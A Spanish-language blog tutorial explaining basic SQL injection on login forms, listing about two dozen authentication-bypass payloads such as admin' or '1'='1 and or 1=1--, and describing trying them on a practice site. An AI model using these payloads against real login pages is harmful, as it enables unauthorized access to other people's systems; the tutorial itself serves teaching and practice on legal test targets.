35 Visitas

Bienvenido, en ese nuevo blog/tutorial empezaremos sobre la famosa vulnerabilidad web SQLi (inyección en la base de datos) una vulnerabilidad bastante común en sitios web antiguos con una base de datos no automatizada o no revisada.

SQLi se considera una vulnerabilidad Crítica (9-10) donde permitiría al atacante realizar un Bypass a acceder en la base de datos de la web, en general, una vulnerabilidad de inyección de SQL permite a un atacante inyectar información maliciosa en una declaración de SQL.

Leyes
Antes de todo, tendríamos que entender las leyes (reglas del juego) para luego poder ganar, para ello, visualizaremos los parámetros básicos de la Base de datos.
* (asteristo) devuelve todas las columnas de la fila de la base de datos seleccionada.

= (igual) devuelve valores que coincidan con la cadena buscada.

‘ (comillas (importante)) indica a la base de datos dónde comienza o termina la cadena de búsqueda.

Ahora hacemos ver que nos encontramos en un login, ahí es dónde se encuentra la “posible” vul SQLi básica, donde podríamos acceder como administradores sin saber los datos.

Para ello haremos el uso de:

admin'; --

¿Que significa eso?
; (punto y coma) indica al analizador SQL que la declaración actual ha finalizado aunque a veces no es necesario.

– (guión doble) indica al analizador SQL que el resto de la línea es un comentario y no debe ejecutarse

Puede que probando ese no funcione, para eso, les traigo una lista de parámetros a utilizar para esa vul.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#

Bien, ahora vamos a ponerlo a práctica, para ello, accederemos AQUÍ donde podemos tastear la página de manera legal o en nuestra web especializada en eso dándole AQUI (user: admin) (pass: password)

Bien, ahora intentaremos acceder en el primer URL mediante esa vul, para ello, haremos uso de la lista de arriba iniciando sesión hasta que nos permita acceder, probando encontré vul mediante (admin’ or ‘1’=’1), en ese caso ya podría acceder como admin en la pág.

No olvides de compartir el blog para más ^^, yo soy VWolf y nos vemos en el próximo tutorial.

  • {{ question.name }} *
    {{ question.help }}
    • {{ answer.label }}
      {{ answer.label }}
    Question answer required or invalid answer

Thank you

You have submitted your response before